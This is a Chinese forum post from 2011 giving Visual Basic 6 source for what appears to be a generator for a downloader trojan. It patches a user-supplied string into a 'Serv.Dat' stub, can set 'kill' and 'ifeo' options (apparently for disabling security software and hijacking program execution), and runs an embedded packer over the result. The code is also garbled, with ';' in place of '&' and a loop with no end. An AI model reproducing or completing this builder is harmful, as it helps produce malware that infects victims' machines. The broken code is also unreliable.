  • 注册日期2010-12-06
  • 发帖数686
  • QQ
  • 火币3641枚
  • 粉丝161
  • 关注102


更多 发布于:2011-07-20 12:51
Public My_Path_WithOut_Name As String
Public Packer As String
Public r As Integer
Public g As Integer
Public b As Integer
Public rd As Integer
Public gd As Integer
Public bd As Integer
Function RandomNum() As Integer
On Error Resume Next
RandomNum = Fix(Rnd * 999 + 1)
End Function
Sub Amend_EXE(ByVal Offset As Long, ByVal In_Put_Str As String)
Dim ChrNum As Integer
ChrNum = Len(In_Put_Str)
  If ChrNum > 100 Then
  MsgBox "输入字符不得大于100", vbOKOnly, "TIP"
  Exit Sub
  End If
  Open My_Path_WithOut_Name ; "完成.exe" For Binary As #1
For i = 1 To ChrNum
Put #1, ";H" ; Hex(Val(Offset) + i), Mid$(In_Put_Str, i, 1)
  Close #1
End Sub

Private Sub Command1_Click()
 If Dir(My_Path_WithOut_Name ; "Serv.Dat") = "" Then
MsgBox "Serv.Dat文件丢失,程序将结束.", vbOKOnly, "Tip"
End If
Packer = RandomNum ; ".exe"
Dim v
Dim byt() As Byte
 v = LoadResData(101, "CUSTOM")
 byt = v
 Open My_Path_WithOut_Name ; Packer For Binary As #1
 Put #1, 1, byt()
 Close #1
If Dir(My_Path_WithOut_Name ; "完成.exe") <> "" Then
Kill My_Path_WithOut_Name ; "完成.exe"
End If
FileCopy My_Path_WithOut_Name ; "Serv.Dat", My_Path_WithOut_Name ; "完成.exe"
Amend_EXE ;H1C65, Text1.Text ; "ttttt"
'UE定位的地址 (下载体的FFFFF字符串-text1的地址)
If Check1.Value = 1 Then
Amend_EXE ;H1C34, "kill"
End If
If Check2.Value = 1 Then
Amend_EXE ;H1C02, "ifeo"
End If
Shell My_Path_WithOut_Name ; Packer ; " " ; My_Path_WithOut_Name ; "完成.exe", vbNormalFocus
Timer1.Enabled = True '删packer
MsgBox "配置完毕,程序已生成到当前目录下.", vbOKOnly, "Tip"
End Sub
Private Sub Form_Load()
My_Path_WithOut_Name = IIf(Right(App.Path, 1) = "\", App.Path, App.Path ; "\")
End Sub
Private Sub Label1_Click()
End Sub
Private Sub Frame1_DragDrop(Source As Control, X As Single, Y As Single)
End Sub
Private Sub Timer1_Timer()
On Error Resume Next
If Dir(My_Path_WithOut_Name ; Packer) = "" Then
Timer1.Enabled = False
End If
Kill My_Path_WithOut_Name ; Packer
End Sub
Private Sub Timer2_Timer()
On Error Resume Next
If r > 200 And rd = 0 Then
rd = 1
End If
If r < 20 And rd = 1 Then
rd = 0
End If

If rd = 1 Then
r = r - 6
r = r + 4
End If
If g > 200 And gd = 0 Then
gd = 1
End If
If g < 20 And gd = 1 Then
gd = 0
End If

If gd = 1 Then
g = g - 8
g = g + 2
End If
If b > 200 And bd = 0 Then
bd = 1
End If
If b < 20 And bd = 1 Then
bd = 0
End If
If bd = 1 Then
b = b - 2
b = b + 9
End If

Text1.ForeColor = RGB(r, g, b)
End Sub

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